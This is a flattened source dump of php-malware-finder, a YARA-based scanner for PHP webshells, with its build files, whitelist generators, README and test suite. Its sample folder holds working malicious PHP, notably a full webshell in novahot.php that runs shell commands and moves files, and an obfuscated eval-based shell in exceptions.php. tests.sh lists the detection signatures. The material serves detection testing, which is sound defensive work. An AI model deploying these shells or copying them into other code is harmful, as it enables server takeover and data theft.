├── .gitignore ├── data ├── samples │ ├── real │ │ ├── ice.php │ │ ├── nano.php │ │ ├── ninja.php │ │ ├── guidtz.php │ │ ├── srt.php │ │ ├── include.php │ │ ├── sucuri_2014_04.php │ │ ├── exceptions.php │ │ ├── novahot.php │ │ └── awvjtnz.php │ ├── undetected │ │ └── smart.php │ ├── classic │ │ ├── c99.php │ │ ├── angel.php │ │ ├── c100.php │ │ ├── sosyete.php │ │ ├── cyb3rsh3ll.php │ │ ├── simattacker.php │ │ └── ajaxshell.php │ ├── obfuscators │ │ ├── online_php_obfuscator.php │ │ ├── phpencode.php │ │ └── cipher_design.php │ ├── artificial │ │ ├── bypasses.php │ │ ├── obfuscated.php │ │ └── dodgy.php │ ├── freepbx.php │ └── cpanel.php ├── whitelists │ ├── custom.yar │ ├── symfony.yar │ ├── phpmyadmin.yar │ └── magento1ce.yar ├── whitelist.yar └── php.yar ├── .dockerignore ├── go.mod ├── go.sum ├── Dockerfile ├── .github └── workflows │ ├── docker.yml │ ├── release.yml │ └── test.yml ├── utils ├── generate_whitelist.py ├── magento1_whitelist.sh ├── magento2_whitelist.sh └── mass_whitelist.py ├── Makefile ├── CONTRIBUTING.md ├── tests.sh ├── README.md ├── LICENSE └── main.go /.gitignore: -------------------------------------------------------------------------------- 1 | php-malware-finder 2 | .idea 3 | -------------------------------------------------------------------------------- /data/samples/real/ice.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.dockerignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .github/ 3 | utils/ 4 | php-malware-finder 5 | -------------------------------------------------------------------------------- /data/samples/real/nano.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/jvoisin/php-malware-finder 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/hillu/go-yara/v4 v4.2.4 7 | github.com/jessevdk/go-flags v1.5.0 8 | ) 9 | 10 | require golang.org/x/sys v0.4.0 // indirect 11 | -------------------------------------------------------------------------------- /data/samples/real/include.php: -------------------------------------------------------------------------------- 1 | 1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); 4 | -------------------------------------------------------------------------------- /data/whitelists/custom.yar: -------------------------------------------------------------------------------- 1 | /* Add your own rules here */ 2 | import "hash" 3 | 4 | private rule Custom : Blog 5 | { 6 | meta: 7 | generated = "2016-07-28T09:50:53.795037" 8 | 9 | condition: 10 | /* my own webapp 0.42 */ 11 | hash.sha1(0, filesize) == "deadbeaf" 12 | } 13 | 14 | -------------------------------------------------------------------------------- /data/samples/obfuscators/online_php_obfuscator.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /data/samples/artificial/bypasses.php: -------------------------------------------------------------------------------- 1 | 15 | -------------------------------------------------------------------------------- /utils/generate_whitelist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=UTF-8 3 | 4 | import fnmatch 5 | import hashlib 6 | import os 7 | import sys 8 | 9 | try: 10 | import yara 11 | except ImportError: 12 | print('Please install python-yara') 13 | sys.exit(1) 14 | 15 | if len(sys.argv) != 3: 16 | print('Usage: %s name_of_the_rule_and_version folder_to_scan' % sys.argv[0]) 17 | sys.exit(1) 18 | 19 | if not os.path.isdir(sys.argv[2]): 20 | print('%s is not a folder !' % sys.argv[2]) 21 | sys.exit(1) 22 | 23 | try: 24 | rules = yara.compile(sys.path[0]+'/../php.yar', includes=True, error_on_warning=False) 25 | except yara.SyntaxError as e: 26 | print("Can't compile rules: %s" % e) 27 | sys.exit(1) 28 | 29 | output_list = list() 30 | 31 | for curdir, dirnames, filenames in os.walk(sys.argv[2]): 32 | for filename in filenames: 33 | fname = os.path.join(curdir, filename) 34 | if 0 < os.stat(fname).st_size < 5 * 1024 * 1024: 35 | matches = rules.match(fname, fast=True) 36 | if matches: 37 | with open(fname, 'rb') as f: 38 | digest = hashlib.sha1(f.read()).hexdigest() 39 | output_list.append('hash.sha1(0, filesize) == "%s" or // %s' % (digest, fname)) 40 | 41 | 42 | if output_list: 43 | output_rule = 'import "hash"\n\nrule %s\n{\n\tcondition:\n\t\t/* %s */\n\t\t' % (sys.argv[1].split(' ')[0], sys.argv[1]) 44 | output_rule += '\n\t\t'.join(output_list) 45 | output_rule += '\n\t\tfalse\n}' 46 | print(output_rule) 47 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: clean rebuild update-deps tests help docker docker-tests docker-publish 2 | 3 | NAME := php-malware-finder 4 | TAG_COMMIT := $(shell git rev-list --abbrev-commit --all --max-count=1) 5 | VERSION := $(shell git describe --abbrev=0 --tags --exact-match $(TAG_COMMIT) 2>/dev/null || true) 6 | IMAGE_VERSION := $(VERSION) 7 | DATE := $(shell git log -1 --format=%cd --date=format:"%Y%m%d%H%M") 8 | ifeq ($(VERSION),) 9 | VERSION := $(DATE) 10 | IMAGE_VERSION := latest 11 | endif 12 | LDFLAGS := "-X main.version=$(VERSION)" 13 | GO_FLAGS := -o $(NAME) -ldflags $(LDFLAGS) 14 | IMAGE_REGISTRY := ghcr.io 15 | IMAGE_REGISTRY_USER := jvoisin 16 | IMAGE_NAME := $(IMAGE_REGISTRY)/$(IMAGE_REGISTRY_USER)/$(NAME) 17 | 18 | all: php-malware-finder 19 | 20 | php-malware-finder: ## Build application 21 | @go build $(GO_FLAGS) . 22 | 23 | clean: ## Delete build artifacts 24 | @rm -f $(NAME) 25 | 26 | rebuild: clean all ## Delete build artifacts and rebuild 27 | 28 | update-deps: ## Update dependencies 29 | @go get -u . 30 | @go mod tidy -v 31 | 32 | tests: php-malware-finder ## Run test suite 33 | @bash ./tests.sh 34 | 35 | docker: ## Build docker image 36 | docker pull $(IMAGE_NAME):latest || true 37 | docker build --pull --cache-from=$(IMAGE_NAME):latest -t $(IMAGE_NAME):latest . 38 | docker tag $(IMAGE_NAME):latest $(IMAGE_NAME):$(IMAGE_VERSION) 39 | 40 | docker-tests: ## Run docker image against the samples folder 41 | @(docker run --rm -v $(shell pwd)/data/samples:/data $(IMAGE_NAME):latest && exit 1) || (test $$? -eq 255 || exit 1) 42 | 43 | docker-publish: ## Push docker image to the container registry 44 | @docker push $(IMAGE_NAME):latest 45 | @(test "$(IMAGE_VERSION)" != "latest" && docker push $(IMAGE_NAME):$(IMAGE_VERSION)) || true 46 | 47 | help: ## Show this help 48 | @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' 49 | -------------------------------------------------------------------------------- /utils/magento1_whitelist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Quit script if something goes wrong 3 | set -o errexit -o nounset -o pipefail; 4 | 5 | SCRIPTDIR="$( dirname "$(readlink -f "$0")" )"; 6 | OUTFILE="${SCRIPTDIR}/../whitelists/magento1ce.yar"; 7 | TMPFILE="${OUTFILE}.new"; 8 | 9 | # First empty the target whitelist so we can completely generate a new one 10 | cat <"${OUTFILE}"; 11 | private rule Magento1Ce : ECommerce 12 | { 13 | condition: 14 | false 15 | } 16 | EOF 17 | 18 | # Create a temporary directory and make sure it is empty 19 | GENTEMPDIR="$( mktemp -d --suffix="_gen_whitelist_m1" )"; 20 | 21 | # Add header to whitelist tempfile 22 | cat < "${OUTFILE}"; 53 | 54 | # Clean up 55 | rm "${TMPFILE}"; 56 | rm -rf "${GENTEMPDIR}"; 57 | -------------------------------------------------------------------------------- /data/samples/obfuscators/cipher_design.php: -------------------------------------------------------------------------------- 1 | +*OJHj1.)n-$HjFsz)&D+.84k?9#+RaqlHb(Ors0cK-DC.$GcReUQ*-(z8#qA=1G&?j=O*jZkRv6Cr$GCTjDAHXZAKb=kr9UxHeZQ=n6hKa#X_bCXD9_OgXZCR5d+.$Dc.X(A*udk*1v+*AZA*5Gc78uA*ej&.(0kEPD&.1#C.8vxEP5k.8sCrndOr1G&.$K&?PjCT#dCH80&.(GATPU+.ndnreT+HPU)n5dO=84kgCGz.XTzv(7xDc#h_Obh,cbhKenh_c6e_C6e_cNh,a6h,aFxge#O*utcKb(Q.(Ul,aZwgj=Cr8(+Tdv_Uv#)_a-_D7#)n1X_Uv#))#v_D$z)nF-h,7#)n1Xh,7#h)vLAHAsk?sEOHe(eKVfA.8KkrV(lReUCqVTl.&6&*9Kkrj#C=8DCTsEOHe(eKVfA.8KkrV(l.ATA*$vl?Vz)_PXh,$zh_PX_U(z)_PXx?Vzh_PXh7v#hnF-_Uv#hn1X_UvZl)v4Xr$5zT#gX?9)Ojs4Q.s(&gJj8E(fkKdI)71Plrb,X($=ARe$)gOJzH$l*v(we.XRh?hb87VIC=&jw_AhVK$85.j#kT$Hng(?X*(U__hT*)C4XU$?5UV$Vv&c)nZx_7jw_jPVn(en88AH*$(+O*XKA.8=ArsZ+=b4k*90CR$TCgVj&q&uQHJ-hKhUe_Ogw,v#xE#sX?n=lEdZx8FNznaKzTCZl)vLC=8U&HXGw#MMn(1n*$VOn(V$5v8O58V)Hjen8$V)878nV81$878$n(XOHU$?8$e$njXf8$1)V8X?V8VP878OV8V?njeO5(XfnjXn8$snV8V_nv8)nje_V8X_HU8?87$_58X_V8VOHjV$njV)nv$_V81_V8e$581)878n8$1f878$n(Xn8$1O*7$n5v8_8$sfnU8)Hje?Vn$fnjen87Xn*$V?8$X$V8efnv8?8$V?5v$_njVPHj1PV8V)VnXO8$1_HU8nnjePnU8P8$e_njsP8$VO8$V)8$XfHUXOHUXfV81f*$X)Hjs$5(1$HU8$87$On(Xf8$XOHjX$nv8_njV$8$V)V8XnHjsnn(1?V8XOn(Xfn(1)V81Pnje_58VOV8V?8$1O*78_nU8_8$Xf*$e$*$Vf8$sf*$X?nje?nvXfn(X)V81$n(XOn(eOV81_8$1$8$1_Vn8PV8X)V8X)5(snnjXf8$V)8$Xn8$1)58e$n(Xn58enn(1n5(VPnj1?n(sn5v8fnjV$HjVf878fn(VOHje$58VPHjenHjV)*aMMeJyrcil1q0oP8HK2D9DwLyo2SA5KtXROD9PI1kwp8whVU7FQMSl0tldTy4k38QUAPQ8NPg==V8V_878)*$sP8$V)*7$fnv$n*$snn(Vn581PnvX$Vn$)V8ennU8nn(1nnj1P5(V$HjVn58s$8$e_HjX)nU$)581_nv8f8$Vn58XnV8XnHjV)nv$fnj1)8$1O*7$Pnje?njV)5(Vn878_n(Vn581nHjenHjenHU$P*$1n878$*$s$V8VnV8XnnUXnnjXfV8V_nje)V8e)HjXn87$nV8V$njV)878_n(e$8$Xf5n$fV8VOHUX?58s)Vn$nHU$_V8e?nj1f8$1PnU$_n(X_nj1f878$Hje?878nnjenn(1P58Xn87Xn8$X)58VfHj1f8$ef8$e)87$)5(V$8$e?nv8OHUX_58V$8$V_n(X)5n$)Hj1nnU8n 3 | -------------------------------------------------------------------------------- /data/samples/real/exceptions.php: -------------------------------------------------------------------------------- 1 | "D", "C"=>"B", "B"=>"4", "E"=>"F", "D"=>"C", "F"=>"7", "1"=>"E", "0"=>"9", "3"=>"0", "2"=>"2", "5"=>"A", "4"=>"8", "7"=>"1", "6"=>"3", "9"=>"5", "8"=>"6");$fuwkgtdbkv = "DgokZGVmYXVsdE0hY6Rpb2BgPS5nQ3MnOwoKQGluaV0zZXQoJ2Vycm0yX2xvZycsTlVMTDk"."FDkCpbmlfc2V3KDdsb2dfZXJyb6JzJywwKTsKQGluaV0zZXQoJ27heE0leGVjdXRpb29fdGltZSc"."sMDkFDkCzZXRfdGltZV0saW7pdDgwKTsKQHNldE0tYWdpY70xdW03ZXNfcnVudGltZSgwKTsKQGR"."lZmluZSgnV7NPX7ZEUlNJT3BnLD5nMiB7LjInKTsKDmlmKGdldE0tYWdpY70xdW03ZXNfZ6CjKDkpIHsKID5gIGZ7b"."mN3aW0uIEdTT6N3cmlwc2xhc2hlcygkYXJyYXkpIHsKID5gID5gIDCyZXR7c"."mBgaXNfYXJyYXkoJGEycmE9KS5/IGEycmE9X27hcDgnV7NPc6RyaXCzbGEzaGVzJywgJGEycmE9KS58IHN3cmlwc2xhc2h"."lcygkYXJyYXkpOwogID5gfQogID5gJE0QT7NUIA3gV7NPc6RyaXCzbGEza"."GVzKDRfU10TVDkFDi5gID5kX3NPT3tJRS50IEdTT6N3cmlwc2xhc2hlcygkX3NPT3tJRSkFDn3KD"."mZ7bmN3aW0uIHdzb3xvZ2luKDkgewogID5gaGVhZGVyKDdIVERQLz1uMD53MAQgTm03I1ZvdW9"."kJykFDi5gIDCkaWUoIjQwNDIpOwp0DgpmdW9jdGlvbiCXU30zZXRjb20raWUoJGssIDR2"."KSCFDi5gID5kX3NPT3tJRVska73gPS5kdjsKID5gIHNldGNvb2tpZSgkaywgJHYpOwp0DgppZ"."ighZW7wdHkoJGE7dGhfcGEzcykpIHsKID5gIGlmKGlzc2V3KDRfU10TVEsncGEzcyddKS5mJi5obWQ7KDRfU10TVEsncGEzc"."yddKS50PS5kYXV3aE0wYXNzKSkKID5gID5gIDCXU30zZXRjb20"."raWUobWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSksIDRhdXRoX6Chc6MpOwoKID5gIGlmIDghaXNzZXQoJE0AT30LSUVbbWQ7KDR"."fU3VSVkVSWydIVERQX3hPU7QnXSldKSC4fD5oJE0AT30LSUVbbWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSl"."dID10IDRhdXRoX6Chc6MpKQogID5gID5gIHdzb3xvZ2luKDkFDn3KDmZ7bmN3aW0uIGEjdGlvblIoKSCFDi5gIDCpZighQ"."DRfU10TVEsnZXYnXSkgewogID5gID5gIDRhIA3gYXJyYXkoDi5gID5g"."ID5gID5gIDJ7bmEtZSIgPTBgcGhwX6VuYW7lKDksDi5gID5gID5gID5gIDJwaHCfdmVyc2lvbiIgPTBgcGhwdmVyc2lvbigpL5og"."ID5gID5gID5gID5id6NvX6ZlcnNpb2BiIA3+IEdTT70WRVJTSU0OL5ogID5gID5gID5gID5ic2EmZW7vZGUiIA3+I1CpbmlfZ2V3"."KDdzYWZlX27vZGUnKQogID5gID5gIDkFDi5gID5gID5gZWNobyCzZXJpYWxpemUoJG1pOwogID5gfSClbHNlIHsKID5"."gID5gIDCldmEsKDRfU10TVEsnZXYnXSkFDi5gIDC0Dn3KDmlmK"."DClbXC3eSgkX7CPU7RbJ2MnXSkgKQogID5gaWYoaXNzZXQoJGRlZmE7bHRfYWN"."3aW0uKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kZGVmYXVsdE0hY6Rpb2BpKQogID5gID5gID"."RfU10TVEsnYyddIA3gJGRlZmE7bHRfYWN3aW0uOwogID5gZWxz"."ZQogID5gID5gIDRfU10TVEsnYyddIA3gJ7NlY3luZm4nOwppZiggIWVtcHR9K"."DRfU10TVEsnYyddKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kX7CPU7RbJ"."2MnXSkgKQogID5gY2EsbE07c2VyX2Z7bmMoJ2EjdGlvbicgLi5kX7CPU7RbJ2MnXSkFDmV"."BaXQF";eval/*k*/(ngomynsz($fuwkgtdbkv, $jgzzljfjj));?> -------------------------------------------------------------------------------- /utils/magento2_whitelist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Quit script if something goes wrong 3 | set -o errexit -o nounset -o pipefail; 4 | 5 | SCRIPTDIR="$( dirname "$(readlink -f "$0")" )"; 6 | OUTFILE="${SCRIPTDIR}/../whitelists/magento2.yar"; 7 | TMPFILE="${OUTFILE}.new"; 8 | 9 | # First empty the target whitelist so we can completely generate a new one 10 | cat <"${OUTFILE}"; 11 | private rule Magento2 : ECommerce 12 | { 13 | condition: 14 | false 15 | } 16 | EOF 17 | 18 | # Create a temporary directory and make sure it is empty 19 | GENTEMPDIR="$( mktemp -d --suffix="_gen_whitelist_m2" )"; 20 | 21 | # Composer access tokens 22 | if [ ! -f "${HOME}/.composer/auth.json" ]; then 23 | echo -e "\nYou have no '.composer/auth.json' in your home dir. We will create it from a template and open an editor."; 24 | echo -e "Press [Enter] to continue. Press Ctrl-C if you wish to leave."; 25 | read; 26 | mkdir -p "${HOME}/.composer"; 27 | cat <"${HOME}/.composer/auth.json" 28 | { 29 | "INFO_GITHUB": "==== GET TOKEN: https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/ ====", 30 | "github-oauth": { 31 | "github.com": "---github-token-goes-here---" 32 | }, 33 | "INFO_MAGENTO": "==== GET TOKEN: https://devdocs.magento.com/guides/v2.0/install-gde/prereq/connect-auth.html ====", 34 | "http-basic": { 35 | "repo.magento.com": { 36 | "username": "---public-key-goes-here---", 37 | "password": "---private-key-goes-here---" 38 | } 39 | } 40 | } 41 | EOF 42 | editor "${HOME}/.composer/auth.json"; 43 | fi 44 | 45 | # Add header to whitelist tempfile 46 | cat < "${OUTFILE}"; 80 | 81 | # Clean up 82 | rm "${TMPFILE}"; 83 | rm -rf "${GENTEMPDIR}"; 84 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | First off, thank you for considering contributing to php-malware-finder. 4 | 5 | ### 1. Where do I go from here? 6 | 7 | If you've noticed a bug, an undetected sample or have a question, 8 | [search the issue tracker](https://github.com/nbs-system/php-malware-finder/issues) 9 | to see if someone else has already created a ticket. If not, go ahead and 10 | [make one](https://github.com/nbs-system/php-malware-finder/issues/new)! 11 | 12 | ### 2. Fork & create a branch 13 | 14 | If this is something you think you can fix, 15 | then [fork php-malware-finder](https://help.github.com/articles/fork-a-repo) and 16 | create a branch with a descriptive name. 17 | 18 | A good branch name would be (where issue #325 is the ticket you're working on): 19 | 20 | ```sh 21 | git checkout -b add_new_sample_wp_bruteforcer 22 | ``` 23 | 24 | ### 3. Get the test suite running 25 | 26 | Just type `make tests`, the testsuite will be run automatically. 27 | 28 | ### 6. Make a Pull Request 29 | 30 | At this point, you should switch back to your master branch and make sure it's 31 | up to date with our upstream master branch: 32 | 33 | ```sh 34 | git remote add upstream git@github.com:nbs-system/php-malware-finder.git 35 | git checkout master 36 | git pull upstream master 37 | ``` 38 | 39 | Then update your feature branch from your local copy of master, and push it! 40 | 41 | ```sh 42 | git checkout add_new_sample_wp_bruteforcer 43 | git rebase master 44 | git push --set-upstream origin add_new_sample_wp_bruteforcer 45 | ``` 46 | 47 | Finally, go to GitHub and [make a Pull Request](https://help.github.com/articles/creating-a-pull-request) :D 48 | 49 | Travis CI will [run our test suite](https://travis-ci.org/nbs-system/php-malware-finder). 50 | We care about quality, so your PR won't be merged until all tests are passing. 51 | 52 | ### 7. Keeping your Pull Request updated 53 | 54 | If a maintainer asks you to "rebase" your PR, they're saying that a lot of code 55 | has changed, and that you need to update your branch so it's easier to merge. 56 | 57 | To learn more about rebasing in Git, there are a lot of [good](http://git-scm.com/book/en/Git-Branching-Rebasing) 58 | [resources](https://help.github.com/articles/interactive-rebase) but here's the suggested workflow: 59 | 60 | ```sh 61 | git checkout add_new_sample_wp_bruteforcer 62 | git pull --rebase upstream master 63 | git push --force-with-lease add_new_sample_wp_bruteforcer 64 | ``` 65 | 66 | ### 8. Merging a PR (maintainers only) 67 | 68 | A PR can only be merged into master by a maintainer if: 69 | 70 | 1. It is passing CI. 71 | 2. It has no requested changes. 72 | 3. It is up to date with current master. 73 | 74 | Any maintainer is allowed to merge a PR if all of these conditions are met. 75 | 76 | ### 9. Shipping a release (maintainers only) 77 | 78 | 1. Make sure that all pending and mergeable pull requests are in 79 | 2. Make sure that the all the tests are passing, with `make tests` 80 | 3. Update the Debian changelog in `./debian/changelog` with `dch -i` 81 | 4. Commit the result 82 | 5. Create a tag for the release: 83 | 84 | ```sh 85 | git checkout master 86 | git pull origin master 87 | make tests 88 | git config user.signingkey 498C46FF087EDC36E7EAF9D445414A82A9B22D78 89 | git config user.email security@nbs-system.com 90 | git tag -s v$MAJOR.$MINOR.$PATCH -m "v$MAJOR.$MINOR.$PATCH" 91 | git push --tags 92 | ``` 93 | 94 | 6. Build the debian package with `make deb` 95 | 7. Create the [release on github](https://github.com/nbs-system/php-malware-finder/releases) 96 | 8. Do the *secret release dance* 97 | -------------------------------------------------------------------------------- /data/samples/real/novahot.php: -------------------------------------------------------------------------------- 1 | 8 | 9 | # TODO: Change this password. Don't leave the default! 10 | define('PASSWORD', 'the-password'); 11 | 12 | # Override the default error handling to: 13 | # 1. Bludgeon PHP `throw`-ing rather than logging errors 14 | # 2. Keep noise out of the error logs 15 | set_error_handler('warning_handler', E_WARNING); 16 | function warning_handler($errno, $errstr) { 17 | throw new ErrorException($errstr); 18 | } 19 | 20 | # get the POSTed JSON input 21 | $post = json_decode(file_get_contents('php://input'), true); 22 | $cwd = ($post['cwd'] !== '') ? $post['cwd'] : getcwd(); 23 | 24 | # feign non-existence if the authentication is invalid 25 | if (!isset($post['auth']) || $post['auth'] !== PASSWORD) { 26 | header('HTTP/1.0 404 Not Found'); 27 | die(); 28 | } 29 | 30 | # return JSON to the client 31 | header('content-type: application/json'); 32 | 33 | # if `cmd` is a trojan payload, execute it 34 | if (function_exists($post['cmd'])) { 35 | $post['cmd']($cwd, $post['args']); 36 | } 37 | 38 | # otherwise, execute a shell command 39 | else { 40 | $output = []; 41 | 42 | # execute the command 43 | $cmd = "cd $cwd; {$post['cmd']} 2>&1; pwd"; 44 | exec($cmd, $output); 45 | $cwd = array_pop($output); 46 | 47 | $response = [ 48 | 'stdout' => $output, 49 | 'stderr' => [], 50 | 'cwd' => $cwd, 51 | ]; 52 | 53 | die(json_encode($response)); 54 | } 55 | 56 | 57 | # File-download payload 58 | function payload_download ($cwd, $args) { 59 | 60 | # cd to the trojan's cwd 61 | chdir($cwd); 62 | 63 | # open the file as binary, and base64-encode its contents 64 | try { 65 | $stdout = base64_encode(file_get_contents($args['file'])); 66 | $stderr = []; 67 | } 68 | 69 | # notify the client on failure 70 | catch (ErrorException $e) { 71 | $stdout = []; 72 | $stderr = [ 'Could not download file.', $e->getMessage() ]; 73 | } 74 | 75 | die(json_encode([ 76 | 'stdout' => $stdout, 77 | 'stderr' => $stderr, 78 | 'cwd' => $cwd, 79 | ])); 80 | } 81 | 82 | # File-upload payload 83 | function payload_upload ($cwd, $args) { 84 | 85 | # cd to the trojan's cwd 86 | chdir($cwd); 87 | 88 | # base64-decode the uploaded bytes, and write them to a file 89 | try { 90 | file_put_contents( $args['dst'], base64_decode($args['data'])); 91 | $stderr = []; 92 | $stdout = [ "File saved to {$args['dst']}." ]; 93 | } 94 | 95 | # notify the client on failure 96 | catch (ErrorException $e) { 97 | $stdout = []; 98 | $stderr = [ 'Could not save file.', $e->getMessage() ]; 99 | } 100 | 101 | die(json_encode([ 102 | 'stdout' => $stdout, 103 | 'stderr' => $stderr, 104 | 'cwd' => $cwd, 105 | ])); 106 | } 107 | 108 | # Trojan autodestruct 109 | function payload_autodestruct ($cwd, $args) { 110 | 111 | # attempt to delete the trojan 112 | try { 113 | 114 | unlink(__FILE__); 115 | $stdout = [ 'File ' . __FILE__ . ' has autodestructed.' ]; 116 | $stderr = []; 117 | } 118 | 119 | # notify the client on failure 120 | catch (ErrorException $e) { 121 | $stdout = []; 122 | $stderr = [ 'File ' . __FILE__ . ' could not autodestruct.']; 123 | } 124 | 125 | die(json_encode([ 126 | 'stdout' => [ 'Instructed ' . __FILE__ . ' to autodestruct.' ], 127 | 'stderr' => [], 128 | 'cwd' => $cwd, 129 | ])); 130 | } 131 | -------------------------------------------------------------------------------- /tests.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | PMF=./php-malware-finder 4 | SAMPLES=./data/samples 5 | 6 | type yara 2>/dev/null 1>&2 || (echo "[-] Please make sure that yara is installed" && exit 1) 7 | 8 | CPT=0 9 | run_test(){ 10 | NB_DETECTED=$(${PMF} -v -a "$SAMPLES"/"$1" 2>&1 | grep -c "$2" 2>/dev/null) 11 | 12 | if [[ "$NB_DETECTED" != 1 ]]; then 13 | echo "[-] $2 was not detected in $1, sorry" 14 | exit 1 15 | fi 16 | CPT=$((CPT+1)) 17 | } 18 | 19 | 20 | # Real samples 21 | run_test cpanel.php '0x294d:$eval: {eval(' 22 | run_test freepbx.php 'ObfuscatedPhp' 23 | run_test freepbx.php '0x72:$eval: { system(' 24 | run_test freepbx.php 'DodgyPhp' 25 | run_test freepbx.php '0x31d:$execution: system(base64_decode' 26 | 27 | # Classic shells 28 | run_test classic/ajaxshell.php 'DodgyStrings' 29 | run_test classic/ajaxshell.php '0x23e2:$: shell_exec' 30 | run_test classic/ajaxshell.php "0x16e0:\$ini_get: ini_get('safe_mode" 31 | run_test classic/ajaxshell.php "0x17f1:\$ini_get: ini_get('open_basedir" 32 | run_test classic/angel.php '0x1b:$disable_magic_quotes:' 33 | run_test classic/b374k.php 'ObfuscatedPhp' 34 | run_test classic/b374k.php "0xe9:\$b374k: 'ev'.'al'" 35 | run_test classic/b374k.php '0xb3:$align: $func="cr"."eat"."e_fun"."cti"."on";$b374k=$func(' 36 | run_test classic/b374k.php '0xd6:$align: ;$b374k=$func(' 37 | run_test classic/b374k.php '0x43:$: github.com/b374k/b374k' 38 | run_test classic/sosyete.php '0x194e:$execution: shell_exec($_POST' 39 | run_test classic/simattacker.php '0x158:$: fpassthru' 40 | run_test classic/r57.php '0x142a2:$: xp_cmdshell' 41 | run_test classic/cyb3rsh3ll.php '0x2200d:$udp_dos: fsockopen("udp://' 42 | run_test classic/c99.php '0x3bb4:$eval: {exec(' 43 | run_test classic/c100.php '0x4f8d:$eval: {eval(' 44 | 45 | # Obfuscated php 46 | run_test obfuscators/cipher_design.php '0x124:$execution: eval(base64_decode' 47 | run_test obfuscators/cipher_design.php '0x123:$eval: ;eval(' 48 | run_test obfuscators/online_php_obfuscator.php '0x51:$eval: ;preg_replace(' 49 | run_test obfuscators/online_php_obfuscator.php "0x52:\$pr: preg_replace('/.*/e" 50 | run_test obfuscators/online_php_obfuscator.php "SuspiciousEncoding" 51 | run_test obfuscators/phpencode.php "ObfuscatedPhp" 52 | run_test obfuscators/phpencode.php "DodgyPhp" 53 | 54 | # Artificial samples to test some rules 55 | run_test artificial/obfuscated.php '0x0:$eval: = 1.17 (using your package manager, or [manually](https://go.dev/doc/install)) 68 | - Install libyara >= 4.2 (using your package manager, or [from source](https://yara.readthedocs.io/en/stable/gettingstarted.html)) 69 | - Download php-malware-finder: `git clone https://github.com/jvoisin/php-malware-finder.git` 70 | - Build php-malware-finder: `cd php-malware-finder && make` 71 | 72 | or replace the last 2 steps with `go install github.com/jvoisin/php-malware-finder`, 73 | which will directly compile and install PMF in your `${GOROOT}/bin` folder. 74 | 75 | ## How to use it? 76 | 77 | ``` 78 | $ ./php-malware-finder -h 79 | Usage: 80 | php-malware-finder [OPTIONS] [Target] 81 | 82 | Application Options: 83 | -r, --rules-dir= Alternative rules location (default: embedded rules) 84 | -a, --show-all Display all matched rules 85 | -f, --fast Enable YARA's fast mode 86 | -R, --rate-limit= Max. filesystem ops per second, 0 for no limit (default: 0) 87 | -v, --verbose Verbose mode 88 | -w, --workers= Number of workers to spawn for scanning (default: 32) 89 | -L, --long-lines Check long lines 90 | -c, --exclude-common Do not scan files with common extensions 91 | -i, --exclude-imgs Do not scan image files 92 | -x, --exclude-ext= Additional file extensions to exclude 93 | -u, --update Update rules 94 | -V, --version Show version number and exit 95 | 96 | Help Options: 97 | -h, --help Show this help message 98 | ``` 99 | 100 | Or if you prefer to use `yara`: 101 | 102 | ``` 103 | $ yara -r ./data/php.yar /var/www 104 | ``` 105 | 106 | Please keep in mind that you should use at least YARA 3.4 because we're using 107 | [hashes]( https://yara.readthedocs.org/en/latest/modules/hash.html ) for the 108 | whitelist system, and greedy regexps. Please note that if you plan to build 109 | yara from sources, libssl-dev must be installed on your system in order to 110 | have support for hashes. 111 | 112 | Oh, and by the way, you can run the *comprehensive* testsuite with `make tests`. 113 | 114 | ### Docker 115 | 116 | If you want to avoid having to install Go and libyara, you can also use our 117 | docker image and simply mount the folder you want to scan to the container's 118 | `/data` directory: 119 | 120 | ``` 121 | $ docker run --rm -v /folder/to/scan:/data ghcr.io/jvoisin/php-malware-finder 122 | ``` 123 | 124 | ## Whitelisting 125 | 126 | Check the [whitelist.yar](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/whitelist.yar) file. 127 | If you're lazy, you can generate whitelists for entire folders with the 128 | [generate_whitelist.py](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/utils/generate_whitelist.py) script. 129 | 130 | ## Why should I use it instead of something else? 131 | 132 | Because: 133 | - It doesn't use [a single rule per sample]( 134 | https://github.com/Neo23x0/signature-base/blob/e264d66a8ea3be93db8482ab3d639a2ed3e9c949/yara/thor-webshells.yar 135 | ), since it only cares about finding malicious patterns, not specific webshells 136 | - It has a [complete testsuite](https://github.com/jvoisin/php-malware-finder/actions), to avoid regressions 137 | - Its whitelist system doesn't rely on filenames 138 | - It doesn't rely on (slow) [entropy computation]( https://en.wikipedia.org/wiki/Entropy_(information_theory) ) 139 | - It uses a ghetto-style static analysis, instead of relying on file hashes 140 | - Thanks to the aforementioned pseudo-static analysis, it works (especially) well on obfuscated files 141 | 142 | ## Licensing 143 | 144 | PHP-malware-finder is 145 | [licensed](https://github.com/jvoisin/php-malware-finder/blob/master/php-malware-finder/LICENSE) 146 | under the GNU Lesser General Public License v3. 147 | 148 | The _amazing_ YARA project is licensed under the Apache v2.0 license. 149 | 150 | Patches, whitelists or samples are of course more than welcome. 151 | -------------------------------------------------------------------------------- /data/whitelist.yar: -------------------------------------------------------------------------------- 1 | /* 2 | Careful. Those rules are pretty heavy on computation 3 | since the 